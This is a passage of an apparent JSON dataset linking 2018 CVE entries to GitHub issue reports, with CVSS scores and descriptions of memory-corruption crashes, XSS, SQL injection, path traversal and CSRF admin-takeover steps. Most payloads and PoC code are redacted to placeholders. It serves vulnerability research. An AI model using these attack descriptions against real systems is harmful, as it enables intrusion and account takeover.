NUMBERTAG e NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG a in APITAG (this NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG e0ec NUMBERTAG at PATHTAG NUMBERTAG b6 in APITAG (this NUMBERTAG e0ec NUMBERTAG path NUMBERTAG out of read Poc\") at PATHTAG NUMBERTAG cd in main (argc NUMBERTAG arg NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char const )>, argc NUMBERTAG arg NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG in _start () Poc: URLTAG",
  20783. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20784. "severity": "HIGH",
  20785. "baseScore": 8.8,
  20786. "impactScore": 5.9,
  20787. "exploitabilityScore": 2.8
  20788. },
  20789. {
  20790. "CVE_ID": "CVE-2018-12265",
  20791. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/365",
  20792. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/365",
  20793. "Repo_new": "exiv2/exiv2",
  20794. "Issue_Created_At": "2018-06-11T09:50:59Z",
  20795. "description": "out of bound read when extract preview images from Poc file . PATHTAG ./exi NUMBERTAG ep1 PATHTAG Error: Upper boundary of data for directory Image, entry NUMBERTAG fe is out of bounds: Offset NUMBERTAG a, size NUMBERTAG exceeds buffer size by NUMBERTAG Bytes; truncating the entry Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Error: Offset of directory Thumbnail, entry NUMBERTAG is out of bounds: Offset NUMBERTAG truncating the entry Segmentation fault (core dumped) PATHTAG gdb q exi NUMBERTAG APITAG Reading symbols from APITAG New LWP NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Core was generated by `./exi NUMBERTAG ep1 APITAG NUMBERTAG Program terminated with signal SIGSEGV, Segmentation fault NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG f NUMBERTAG ccde NUMBERTAG in APITAG (this NUMBERTAG buf NUMBERTAG ffda NUMBERTAG e NUMBERTAG h8,pos NUMBERTAG rcount NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG f NUMBERTAG in APITAG APITAG advance NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce2cc NUMBERTAG in APITAG (io=...) at PATHTAG NUMBERTAG f NUMBERTAG cce2c9b7 in APITAG (data NUMBERTAG f NUMBERTAG cd4b7fff <error: Cannot access memory at address NUMBERTAG f NUMBERTAG cd4b7fff>, size NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG in (anonymous APITAG (this NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG b8 in APITAG (this NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG ccb0) at PATHTAG NUMBERTAG b6 in APITAG (this NUMBERTAG ccb0, APITAG NUMBERTAG at PATHTAG NUMBERTAG cd in main (argc NUMBERTAG arg NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cc2f NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char const )>, argc NUMBERTAG arg NUMBERTAG ffda NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG in _start () APITAG URLTAG",
  20796. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20797. "severity": "HIGH",
  20798. "baseScore": 8.8,
  20799. "impactScore": 5.9,
  20800. "exploitabilityScore": 2.8
  20801. },
  20802. {
  20803. "CVE_ID": "CVE-2018-12272",
  20804. "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/148",
  20805. "Issue_Url_new": "https://github.com/ximdex/xcms/issues/148",
  20806. "Repo_new": "ximdex/xcms",
  20807. "Issue_Created_At": "2018-06-12T02:28:07Z",
  20808. "description": "XSS in parameter content . vulnerability url: FILETAG parameter content payload: APITAG FILETAG",
  20809. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20810. "severity": "MEDIUM",
  20811. "baseScore": 6.1,
  20812. "impactScore": 2.7,
  20813. "exploitabilityScore": 2.8
  20814. },
  20815. {
  20816. "CVE_ID": "CVE-2018-12273",
  20817. "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/149",
  20818. "Issue_Url_new": "https://github.com/ximdex/xcms/issues/149",
  20819. "Repo_new": "ximdex/xcms",
  20820. "Issue_Created_At": "2018-06-12T03:06:45Z",
  20821. "description": "xss vulnerability in two parameters in DMS Demo. vulnerability url: URLTAG two parameters: Ciudad APITAG Nombre APITAG result: FILETAG Author: zhihua. EMAILTAG .cn",
  20822. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20823. "severity": "MEDIUM",
  20824. "baseScore": 6.1,
  20825. "impactScore": 2.7,
  20826. "exploitabilityScore": 2.8
  20827. },
  20828. {
  20829. "CVE_ID": "CVE-2018-12320",
  20830. "Issue_Url_old": "https://github.com/radare/radare2/issues/10293",
  20831. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10293",
  20832. "Repo_new": "radareorg/radare2",
  20833. "Issue_Created_At": "2018-06-08T13:10:06Z",
  20834. "description": "Use after free in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior UAF in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  20835. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20836. "severity": "HIGH",
  20837. "baseScore": 7.8,
  20838. "impactScore": 5.9,
  20839. "exploitabilityScore": 1.8
  20840. },
  20841. {
  20842. "CVE_ID": "CVE-2018-12321",
  20843. "Issue_Url_old": "https://github.com/radare/radare2/issues/10296",
  20844. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10296",
  20845. "Repo_new": "radareorg/radare2",
  20846. "Issue_Created_At": "2018-06-08T13:17:31Z",
  20847. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  20848. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20849. "severity": "HIGH",
  20850. "baseScore": 7.8,
  20851. "impactScore": 5.9,
  20852. "exploitabilityScore": 1.8
  20853. },
  20854. {
  20855. "CVE_ID": "CVE-2018-12322",
  20856. "Issue_Url_old": "https://github.com/radare/radare2/issues/10294",
  20857. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10294",
  20858. "Repo_new": "radareorg/radare2",
  20859. "Issue_Created_At": "2018-06-08T13:13:27Z",
  20860. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | iNES ROM dump | Architecture/bits of the file (mandatory) | NES | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  20861. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20862. "severity": "MEDIUM",
  20863. "baseScore": 5.5,
  20864. "impactScore": 3.6,
  20865. "exploitabilityScore": 1.8
  20866. },
  20867. {
  20868. "CVE_ID": "CVE-2018-12339",
  20869. "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/4",
  20870. "Issue_Url_new": "https://github.com/woider/articlecms/issues/4",
  20871. "Repo_new": "woider/articlecms",
  20872. "Issue_Created_At": "2018-06-13T17:10:13Z",
  20873. "description": "There have XSS vulnerability that can excute javascript. sign up and select \"add an article\", Insert the payload \" APITAG alert NUMBERTAG APITAG \" in the title and submit. open index line NUMBERTAG CODETAG",
  20874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20875. "severity": "MEDIUM",
  20876. "baseScore": 5.4,
  20877. "impactScore": 2.7,
  20878. "exploitabilityScore": 2.3
  20879. },
  20880. {
  20881. "CVE_ID": "CVE-2018-12421",
  20882. "Issue_Url_old": "https://github.com/ltb-project/self-service-password/issues/211",
  20883. "Issue_Url_new": "https://github.com/ltb-project/self-service-password/issues/211",
  20884. "Repo_new": "ltb-project/self-service-password",
  20885. "Issue_Created_At": "2018-06-14T05:32:40Z",
  20886. "description": "Force string conversion of input values. To avoid attacks with input values (using arrays or another PHP object), we should force string conversion.",
  20887. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20888. "severity": "CRITICAL",
  20889. "baseScore": 9.8,
  20890. "impactScore": 5.9,
  20891. "exploitabilityScore": 3.9
  20892. },
  20893. {
  20894. "CVE_ID": "CVE-2018-12421",
  20895. "Issue_Url_old": "https://github.com/ltb-project/self-service-password/issues/209",
  20896. "Issue_Url_new": "https://github.com/ltb-project/self-service-password/issues/209",
  20897. "Repo_new": "ltb-project/self-service-password",
  20898. "Issue_Created_At": "2018-06-13T15:42:07Z",
  20899. "description": "Check ldap_bind return code instead of relying on ldap_errno. As it can be seen in the issue open on APITAG the ldap_errno is not filled if there was an error when calling ldap_bind: CVETAG We have a PR NUMBERTAG that is workaround by checking that parameters are strings, but this does not prevent another ldap_bind error. We need to check ldap_bind return code before looking at ldap_errno.",
  20900. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20901. "severity": "CRITICAL",
  20902. "baseScore": 9.8,
  20903. "impactScore": 5.9,
  20904. "exploitabilityScore": 3.9
  20905. },
  20906. {
  20907. "CVE_ID": "CVE-2018-12423",
  20908. "Issue_Url_old": "https://github.com/matrix-org/matrix-doc/issues/1304",
  20909. "Issue_Url_new": "https://github.com/matrix-org/matrix-spec-proposals/issues/1304",
  20910. "Repo_new": "matrix-org/matrix-spec-proposals",
  20911. "Issue_Created_At": "2018-06-14T09:12:44Z",
  20912. "description": "Proposal to simplify the auth rules of m. APITAG events.. Documentation: URLTAG Author: MENTIONTAG MENTIONTAG Date NUMBERTAG Fixes URLTAG",
  20913. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  20914. "severity": "HIGH",
  20915. "baseScore": 7.5,
  20916. "impactScore": 3.6,
  20917. "exploitabilityScore": 3.9
  20918. },
  20919. {
  20920. "CVE_ID": "CVE-2018-12447",
  20921. "Issue_Url_old": "https://github.com/ebel34/bpg-web-encoder/issues/2",
  20922. "Issue_Url_new": "https://github.com/ebel34/bpg-web-encoder/issues/2",
  20923. "Repo_new": "ebel34/bpg-web-encoder",
  20924. "Issue_Created_At": "2018-06-15T03:13:29Z",
  20925. "description": "an heapoverflow bug which could lead to execute code in libbpg. an heapoverflow bug which could lead to execute code in libbpg interger overflow at APITAG CODETAG after adding a negative number the src will be somewhere before the mmaped area, therefore we can write anything before the mmaped area, there are libc before it, so if we can designed the added value, we can gain a code execution. summary: interger overflow at the function restore_tqb_pixels of hevc_filter.c execute method: ./bpgdec poc o /dev/null asan URLTAG poc URLTAG",
  20926. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20927. "severity": "HIGH",
  20928. "baseScore": 8.8,
  20929. "impactScore": 5.9,
  20930. "exploitabilityScore": 2.8
  20931. },
  20932. {
  20933. "CVE_ID": "CVE-2018-12493",
  20934. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/12",
  20935. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/12",
  20936. "Repo_new": "sanluan/publiccms",
  20937. "Issue_Created_At": "2018-06-15T02:34:32Z",
  20938. "description": "There is a APITAG Traversal\" and APITAG file read\" vulnerability that can read system dir and file. First you should login demo account, Directory Traversal POC: CODETAG Arbitrary file read POC: CODETAG You can use these two poc brower system dir and read any file~",
  20939. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  20940. "severity": "MEDIUM",
  20941. "baseScore": 6.5,
  20942. "impactScore": 3.6,
  20943. "exploitabilityScore": 2.8
  20944. },
  20945. {
  20946. "CVE_ID": "CVE-2018-12498",
  20947. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/26",
  20948. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/26",
  20949. "Repo_new": "idreamsoft/iCMS",
  20950. "Issue_Created_At": "2018-06-14T08:09:18Z",
  20951. "description": "ICMS NUMBERTAG have a SQLi in FILETAG . POC: APITAG POST: APITAG and APITAG Vulnerability file: PATHTAG ERRORTAG iCMS MENTIONTAG set poid APITAG id CODETAG iCMS MENTIONTAG set rid APITAG id CODETAG iCMS MENTIONTAG set cid APITAG id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id CODETAG The $id parameter is brought into SQL execution without any filtering, resulting in SQL injection.",
  20952. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20953. "severity": "CRITICAL",
  20954. "baseScore": 9.8,
  20955. "impactScore": 5.9,
  20956. "exploitabilityScore": 3.9
  20957. },
  20958. {
  20959. "CVE_ID": "CVE-2018-12537",
  20960. "Issue_Url_old": "https://github.com/eclipse/vert.x/issues/2470",
  20961. "Issue_Url_new": "https://github.com/eclipse-vertx/vert.x/issues/2470",
  20962. "Repo_new": "eclipse-vertx/vert.x",
  20963. "Issue_Created_At": "2018-05-23T10:31:39Z",
  20964. "description": "Http header validation. motivation Currently APITAG and APITAG don't check wether header name or value contain APITAG or APITAG chars. Of course developers are fully responsible for http headers set and such incorrect value is likely unintended. Forbidding it prevents HTTP header injection for application that omit to check headers. change throw an ERRORTAG when a header name or value contains APITAG or APITAG char",
  20965. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  20966. "severity": "MEDIUM",
  20967. "baseScore": 5.3,
  20968. "impactScore": 1.4,
  20969. "exploitabilityScore": 3.9
  20970. },
  20971. {
  20972. "CVE_ID": "CVE-2018-12541",
  20973. "Issue_Url_old": "https://github.com/eclipse-vertx/vert.x/issues/2648",
  20974. "Issue_Url_new": "https://github.com/eclipse-vertx/vert.x/issues/2648",
  20975. "Repo_new": "eclipse-vertx/vert.x",
  20976. "Issue_Created_At": "2018-10-03T07:02:03Z",
  20977. "description": "APITAG upgrade request body limit. CVETAG : The APITAG HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit NUMBERTAG bytes) above which the APITAG gets an HTTP response with the NUMBERTAG status code and the connection gets closed.",
  20978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  20979. "severity": "MEDIUM",
  20980. "baseScore": 6.5,
  20981. "impactScore": 3.6,
  20982. "exploitabilityScore": 2.8
  20983. },
  20984. {
  20985. "CVE_ID": "CVE-2018-12542",
  20986. "Issue_Url_old": "https://github.com/vert-x3/vertx-web/issues/1025",
  20987. "Issue_Url_new": "https://github.com/vert-x3/vertx-web/issues/1025",
  20988. "Repo_new": "vert-x3/vertx-web",
  20989. "Issue_Created_At": "2018-10-03T07:06:09Z",
  20990. "description": "Neutralize property backward slashes sequences in APITAG CVETAG : The APITAG uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ' (backward slashes) sequences that can resolve to a location that is outside of that directory when running on Windows Operating Systems. This was reported by Vishwanath Viraktamath < EMAILTAG >",
  20991. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20992. "severity": "CRITICAL",
  20993. "baseScore": 9.8,
  20994. "impactScore": 5.9,
  20995. "exploitabilityScore": 3.9
  20996. },
  20997. {
  20998. "CVE_ID": "CVE-2018-12544",
  20999. "Issue_Url_old": "https://github.com/vert-x3/vertx-web/issues/1021",
  21000. "Issue_Url_new": "https://github.com/vert-x3/vertx-web/issues/1021",
  21001. "Repo_new": "vert-x3/vertx-web",
  21002. "Issue_Created_At": "2018-09-27T12:55:43Z",
  21003. "description": "Potential XXE vulnerability in vertx web. Version vert.x web: APITAG Mitigation Follow the OWASP guide below which provides concise information to prevent this vulnerability. URLTAG",
  21004. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21005. "severity": "CRITICAL",
  21006. "baseScore": 9.8,
  21007. "impactScore": 5.9,
  21008. "exploitabilityScore": 3.9
  21009. },
  21010. {
  21011. "CVE_ID": "CVE-2018-12578",
  21012. "Issue_Url_old": "https://github.com/pts/sam2p/issues/39",
  21013. "Issue_Url_new": "https://github.com/pts/sam2p/issues/39",
  21014. "Repo_new": "pts/sam2p",
  21015. "Issue_Created_At": "2018-06-19T11:47:25Z",
  21016. "description": "heap buffer overflow in bmp_compress1_row. Description of problem: There is a heap buffer overflow in bmp_compress1_row. Version Release number of selected component (if applicable): <= latest version The output information is as follows: CODETAG The gdb debugging information is listed below:(with asan) ERRORTAG that is a breif description\uff0ci will update found by pwd MENTIONTAG",
  21017. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21018. "severity": "CRITICAL",
  21019. "baseScore": 9.8,
  21020. "impactScore": 5.9,
  21021. "exploitabilityScore": 3.9
  21022. },
  21023. {
  21024. "CVE_ID": "CVE-2018-12582",
  21025. "Issue_Url_old": "https://github.com/p8w/akcms/issues/1",
  21026. "Issue_Url_new": "https://github.com/git-hash/akcms/issues/1",
  21027. "Repo_new": "git-hash/akcms",
  21028. "Issue_Created_At": "2018-06-25T15:07:50Z",
  21029. "description": "CSRF that can add an admin by submiting this form.. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  21030. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21031. "severity": "HIGH",
  21032. "baseScore": 8.8,
  21033. "impactScore": 5.9,
  21034. "exploitabilityScore": 2.8
  21035. },
  21036. {
  21037. "CVE_ID": "CVE-2018-12583",
  21038. "Issue_Url_old": "https://github.com/p8w/akcms/issues/2",
  21039. "Issue_Url_new": "https://github.com/git-hash/akcms/issues/2",
  21040. "Repo_new": "git-hash/akcms",
  21041. "Issue_Created_At": "2018-06-25T15:13:58Z",
  21042. "description": "CSRF that can delete article if user click 'submit'.. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  21043. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  21044. "severity": "MEDIUM",
  21045. "baseScore": 6.5,
  21046. "impactScore": 3.6,
  21047. "exploitabilityScore": 2.8
  21048. },
  21049. {
  21050. "CVE_ID": "CVE-2018-12588",
  21051. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/3805",
  21052. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/3805",
  21053. "Repo_new": "pkp/pkp-lib",
  21054. "Issue_Created_At": "2018-06-18T16:02:58Z",
  21055. "description": "Correct missing escaping in APITAG",
  21056. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21057. "severity": "MEDIUM",
  21058. "baseScore": 6.1,
  21059. "impactScore": 2.7,
  21060. "exploitabilityScore": 2.8
  21061. },
  21062. {
  21063. "CVE_ID": "CVE-2018-12599",
  21064. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1177",
  21065. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1177",
  21066. "Repo_new": "imagemagick/imagemagick",
  21067. "Issue_Created_At": "2018-06-19T13:39:47Z",
  21068. "description": "out of bounds write in bmp.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG Steps to Reproduce In coders/bmp.c ERRORTAG (image >rows y NUMBERTAG bytes_per_line may be much larger than APITAG will cause an out of bounds write bug in line NUMBERTAG of coders/bmp.c To reproduce this problem: ERRORTAG Debugging information\uff1a ERRORTAG POC FILETAG System Configuration APITAG APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
  21069. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21070. "severity": "HIGH",
  21071. "baseScore": 8.8,
  21072. "impactScore": 5.9,
  21073. "exploitabilityScore": 2.8
  21074. },
  21075. {
  21076. "CVE_ID": "CVE-2018-12601",
  21077. "Issue_Url_old": "https://github.com/pts/sam2p/issues/41",
  21078. "Issue_Url_new": "https://github.com/pts/sam2p/issues/41",
  21079. "Repo_new": "pts/sam2p",
  21080. "Issue_Created_At": "2018-06-20T07:30:42Z",
  21081. "description": "heap buffer overflow in function APITAG Description of problem: There is a heap buffer overflow in function APITAG input tga.ci line NUMBERTAG from debug info) Version Release number of selected component (if applicable): sam2p NUMBERTAG The output information is as follows(with asan): ERRORTAG that is a breif description\uff0ci will update found by APITAG",
  21082. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21083. "severity": "CRITICAL",
  21084. "baseScore": 9.8,
  21085. "impactScore": 5.9,
  21086. "exploitabilityScore": 3.9
  21087. },
  21088. {
  21089. "CVE_ID": "CVE-2018-12604",
  21090. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/110",
  21091. "Issue_Url_new": "https://github.com/greencms/greencms/issues/110",
  21092. "Repo_new": "greencms/greencms",
  21093. "Issue_Created_At": "2018-06-20T09:19:06Z",
  21094. "description": "APITAG \u6f0f\u6d1e\u53d1\u73b0\u8005\uff1avr_system \u6076\u610f\u653b\u51fb\u8005\u53ef\u4ee5\u4e0b\u8f7d\u7f51\u7ad9\u5168\u90e8\u65e5\u5fd7\u3002 \u6d4b\u8bd5\u5730\u5740\uff1a FILETAG \u6848\u4f8b\u5730\u5740\uff1a FILETAG PATHTAG \u53ea\u9700\u8981\u5c1d\u8bd5\u731c\u6d4b\u65e5\u5fd7\u7684\u65e5\u671f\uff0c\u5c31\u80fd\u591f\u4e0b\u8f7d\u5168\u90e8\u65e5\u5fd7\u3002 \u9632\u5fa1\u65b9\u6cd5\uff1a\u52a0\u5f3a\u65e5\u5fd7\u540d\u79f0\u7684\u590d\u6742\u7a0b\u5ea6\u3002",
  21095. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21096. "severity": "HIGH",
  21097. "baseScore": 7.5,
  21098. "impactScore": 3.6,
  21099. "exploitabilityScore": 3.9
  21100. },
  21101. {
  21102. "CVE_ID": "CVE-2018-12655",
  21103. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/99",
  21104. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/99",
  21105. "Repo_new": "slims/slims8_akasia",
  21106. "Issue_Created_At": "2018-06-21T03:44:53Z",
  21107. "description": "FILETAG FILETAG",
  21108. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21109. "severity": "MEDIUM",
  21110. "baseScore": 6.1,
  21111. "impactScore": 2.7,
  21112. "exploitabilityScore": 2.8
  21113. },
  21114. {
  21115. "CVE_ID": "CVE-2018-12656",
  21116. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/100",
  21117. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/100",
  21118. "Repo_new": "slims/slims8_akasia",
  21119. "Issue_Created_At": "2018-06-21T03:49:12Z",
  21120. "description": "FILETAG FILETAG",
  21121. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21122. "severity": "MEDIUM",
  21123. "baseScore": 6.1,
  21124. "impactScore": 2.7,
  21125. "exploitabilityScore": 2.8
  21126. },
  21127. {
  21128. "CVE_ID": "CVE-2018-12657",
  21129. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/101",
  21130. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/101",
  21131. "Repo_new": "slims/slims8_akasia",
  21132. "Issue_Created_At": "2018-06-21T03:56:19Z",
  21133. "description": "FILETAG FILETAG",
  21134. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21135. "severity": "MEDIUM",
  21136. "baseScore": 6.1,
  21137. "impactScore": 2.7,
  21138. "exploitabilityScore": 2.8
  21139. },
  21140. {
  21141. "CVE_ID": "CVE-2018-12658",
  21142. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/102",
  21143. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/102",
  21144. "Repo_new": "slims/slims8_akasia",
  21145. "Issue_Created_At": "2018-06-21T04:00:28Z",
  21146. "description": "FILETAG FILETAG",
  21147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21148. "severity": "MEDIUM",
  21149. "baseScore": 6.1,
  21150. "impactScore": 2.7,
  21151. "exploitabilityScore": 2.8
  21152. },
  21153. {
  21154. "CVE_ID": "CVE-2018-12659",
  21155. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/103",
  21156. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/103",
  21157. "Repo_new": "slims/slims8_akasia",
  21158. "Issue_Created_At": "2018-06-21T04:28:03Z",
  21159. "description": "FILETAG NUMBERTAG Namun sayangnya tidak ada pengecekan pada sisi server side untuk mengecek keberadaan parameter csrf_token. Sehingga dapat dibuat exploit sebagai berikut ERRORTAG NUMBERTAG Simpan script exploit diatas sebagai html file NUMBERTAG Kirimkan FILETAG kepada korban yang sedang login pada slims miliknya. FILETAG NUMBERTAG Berikut ini merupakan respon dari hasil perubahan data admin. FILETAG NUMBERTAG Setelah berhasil, attacker dapat mengambil alih akun tersebut dengan login ke sistem slims korban menggunakan username : admin password : faisal",
  21160. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21161. "severity": "HIGH",
  21162. "baseScore": 8.8,
  21163. "impactScore": 5.9,
  21164. "exploitabilityScore": 2.8
  21165. },
  21166. {
  21167. "CVE_ID": "CVE-2018-12679",
  21168. "Issue_Url_old": "https://github.com/Tanganelli/CoAPthon3/issues/16",
  21169. "Issue_Url_new": "https://github.com/tanganelli/coapthon3/issues/16",
  21170. "Repo_new": "tanganelli/coapthon3",
  21171. "Issue_Created_At": "2018-12-27T14:18:24Z",
  21172. "description": "Denial of Service vulnerability caused by improper exception handling while parsing of APITAG messages . Multiple sample applications from APITAG library are vulnerable to Denial of Service attacks caused by maliciously crafted APITAG messages. Method APITAG improperly handle multiple exception types leading to crash of applications (including standard APITAG server, APITAG client, example collect APITAG server and client). Example payloads and unhandled exceptions NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in deserialize APITAG = APITAG NUMBERTAG File PATHTAG line NUMBERTAG in decode return APITAG errors, True) ERRORTAG 'utf8' codec can't decode byte NUMBERTAG fd in position NUMBERTAG invalid start byte NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in deserialize APITAG = APITAG NUMBERTAG File PATHTAG line NUMBERTAG in token value = str(value) ERRORTAG 'ascii' codec can't encode character u'\\u NUMBERTAG in position NUMBERTAG ordinal not in range NUMBERTAG Proposed CVSS score: PATHTAG NUMBERTAG High) Mitigation: All exception types should be handled in the main loop of APITAG applications (including standard APITAG server, APITAG client, example collect APITAG server and client), to provide uninterruptible service. FILETAG Issue was reported via email on NUMBERTAG th of February to APITAG developers and registered 